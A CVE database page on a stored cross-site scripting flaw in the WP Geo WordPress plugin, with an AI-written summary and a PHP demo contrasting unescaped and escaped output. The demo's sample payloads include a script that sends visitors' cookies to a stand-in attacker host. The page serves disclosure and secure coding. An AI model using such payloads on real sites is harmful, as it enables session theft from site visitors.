CVE-2025-62904
Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ben Huson WP Geo (wp-geo) allows Stored XSS. This issue affects WP Geo: from n/a through 3.5.1.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stored XSS in the WP Geo WordPress plugin, versions up to and including 3.5.1: an authenticated user with contributor-level access can store script that later executes in the browsers of users who view the affected pages.
Vulnerability
CVE-2025-62904 is a stored cross-site scripting (XSS) vulnerability in the WP Geo plugin for WordPress, affecting all versions up to and including 3.5.1 (the lower bound of the affected range is listed as n/a). The plugin does not properly neutralize user-supplied input before writing it into generated pages, so attacker-controlled markup is saved server-side and later rendered as live HTML and script.
Exploitation
An attacker needs at least contributor-level access to the WordPress site. Such a user can save arbitrary HTML and JavaScript through content the plugin renders; the payload is stored and executes in the browser of every user who views the affected post or page, including other logged-in users and anonymous site visitors.
Impact
Successful exploitation lets the attacker redirect visitors to malicious sites, display unauthorized advertisements, steal session cookies that are not protected by the HttpOnly flag, or deface the website. Because the injected script runs in the victim's browser under the site's own origin, it can also act on the victim's behalf within the site.
Mitigation
The vulnerability is addressed by updating WP Geo to a patched release (3.5.2 or later, per the Patchstack advisory [1]). Sites that cannot update immediately should reduce exposure instead: audit and limit contributor-level accounts, review content recently saved by those accounts for injected markup, and place a Web Application Firewall (WAF) rule in front of the site as a temporary measure. Adding output escaping through a custom filter is only a stopgap, and it requires knowing exactly where the plugin renders the stored value.
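To illustrate the mechanism described under Vulnerability and the output-escaping stopgap mentioned above, the following PHP is an added example written for this page; it is not WP Geo's code and is not taken from the Patchstack advisory. The field name, markup and function names are hypothetical and the payloads are constructed. It shows an unescaped rendering path beside one escaped for its output context, why sanitizing on save alone is insufficient, and a version_compare() check against the affected range.

```php
<?php
// Added example of the stored cross-site scripting pattern (CWE-79) that the
// CVE text describes, written as a generic WordPress plugin rendering path.
// This is NOT WP Geo's code: the markup and function names are hypothetical.
// Runs stand-alone with `php stored_xss_demo.php`.

// Constructed sample payloads: what a contributor-level user might save into
// a plugin field (post meta or post content) that is never filtered.
const STORED_LOCATION = 'Berlin" onmouseover="alert(document.cookie)';
const STORED_TITLE    = '<script>location="https://attacker.example/?c="+document.cookie</script>Map';

// Vulnerable: the stored strings are concatenated straight into an attribute
// and into element text during page generation. The browser treats the quote
// as the end of data-location, gains an onmouseover handler, and executes the
// <script> element.
function render_vulnerable(string $title, string $location): string
{
    return '<div class="geo-map" data-location="' . $location . '">'
         . $title . '</div>';
}

// Hardened: escape at output time for the HTML context being written.
// In WordPress this is esc_attr() for attribute values and esc_html() for
// text nodes; both wrap htmlspecialchars() with ENT_QUOTES, which is called
// directly here so the script runs outside WordPress.
function escape_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_hardened(string $title, string $location): string
{
    return '<div class="geo-map" data-location="' . escape_html($location) . '">'
         . escape_html($title) . '</div>';
}

// Defence in depth: sanitize on save as well (WordPress: sanitize_text_field(),
// or wp_kses_post() where limited HTML is legitimate). Stripping tags alone
// does NOT neutralise the attribute-breakout payload, which contains no tag,
// so output escaping remains mandatory.
function sanitize_on_save(string $s): string
{
    return trim(strip_tags($s));
}

// Version check implied by the advisory range "through 3.5.1": true for any
// installed version that is still affected.
function is_affected_version(string $installed): bool
{
    return version_compare($installed, '3.5.1', '<=');
}

echo "Vulnerable output:\n", render_vulnerable(STORED_TITLE, STORED_LOCATION), "\n\n";
echo "Hardened output:\n",   render_hardened(STORED_TITLE, STORED_LOCATION),   "\n\n";
echo "After strip_tags only: ", sanitize_on_save(STORED_LOCATION), "\n";
foreach (['3.4.0', '3.5.1', '3.5.2'] as $v) {
    printf("WP Geo %s affected: %s\n", $v, is_affected_version($v) ? 'yes' : 'no');
}
```

The hardened output renders the payload as visible text rather than markup; the strip_tags line shows the attribute-breakout string surviving untouched, which is why escaping must happen at the point of output, not only on save.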
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products: 2
Patches: 0
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References: 1
News mentions: 0
No linked articles in our index yet.